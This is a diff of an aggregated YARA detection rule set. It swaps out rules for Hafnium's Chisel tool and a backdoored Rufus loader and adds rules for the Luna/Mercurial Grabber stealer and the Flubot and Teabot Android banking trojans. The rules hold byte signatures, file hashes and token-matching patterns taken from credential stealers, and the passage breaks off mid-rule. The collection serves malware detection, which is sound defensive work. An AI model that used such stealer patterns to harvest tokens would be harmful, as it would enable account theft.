+		$s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Rule for detecting Chisel kit tool used by Hafnium"
+		description = "Detect Luna stealer (also Mercurial Grabber)"
 		author = "Arkbird_SOLG"
-		id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6"
-		date = "2021-02-23"
-		modified = "2021-04-25"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28"
+		id = "2fecce99-5869-5de0-afae-6dc245748fa6"
+		date = "2021-08-29"
+		modified = "2021-08-30"
+		reference = "https://github.com/NightfallGT/Mercurial-Grabber"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04"
-		logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de"
+		logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		adversary = "Hafnium"
-		tlp = "white"
+		hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18"
+		hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f"
+		hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21"
+		hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e }
-		$str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 }
-		$str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 }
-		$str4 = { 28 65 72 72 6f 72 20 25 73 29 }
-		$str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 }
-		$str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 }
-		$str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73}
-		$str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 }
-		$str9 = { 70 72 6f 78 79 23 25 73 }
-		$seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 }
-		$seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 }
-		$seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 }
+		$s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a }
+		$s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a }
+		$s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a }
+		$x1 = "---------------- mercurial grabber ----------------" fullword wide
+		$x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f }
+		$x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 2 of ( $seq* ) and 7 of ( $str* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $x* ) and 2 of ( $s* )
 }
 /*
  * YARA Rule Set
  * Repository Name: Telekom Security
  * Repository: https://github.com/telekom-security/malware_analysis/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: bf832d97e8fd292ec5e095e35bde992a6462e71c
  * Number of Rules: 12
  * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance)
@@ -161276,33 +161223,96 @@ rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE
  *
  * NO LICENSE SET
  */
-rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777
+rule TELEKOM_SECURITY_Android_Flubot : FILE
 {
 	meta:
-		description = "Detects backdoored Rufus with Vatet Loader of Defray777"
+		description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "d6d1eebc-961f-5032-af04-4c95f364a74d"
+		date = "2021-09-14"
+		modified = "2021-09-14"
+		reference = "https://github.com/telekom-security/malware_analysis/"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19"
+		license_url = "N/A"
+		hash = "37be18494cd03ea70a1fdd6270cef6e3"
+		logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df"
+		score = 75
+		quality = 45
+		tags = "FILE"
+		version = "20210720"
+
+	strings:
+		$dex = "dex"
+		$vdex = "vdex"
+		$s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE"
+		$s2 = "java/net/HttpURLConnection;"
+		$s3 = "java/security/spec/X509EncodedKeySpec;"
+		$s4 = "MANUFACTURER"
+
+	condition:
+		($dex at 0 or $vdex at 0 ) and 3 of ( $s* )
+}
+rule TELEKOM_SECURITY_Android_Teabot : FILE
+{
+	meta:
+		description = "matches on dumped, decrypted V/DEX files of Teabot"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "9db701bf-be84-5236-97f7-67043cf3ea93"
+		date = "2021-09-14"
+		modified = "2021-09-14"
+		reference = "https://github.com/telekom-security/malware_analysis/"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23"
+		license_url = "N/A"
+		hash = "37be18494cd03ea70a1fdd6270cef6e3"
+		logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8"
+		score = 75
+		quality = 45
+		tags = "FILE"
+		version = "20210819"
+
+	strings:
+		$dex = "dex"
+		$vdex = "vdex"
+		$s1 = "ERR 404: Unsupported device"
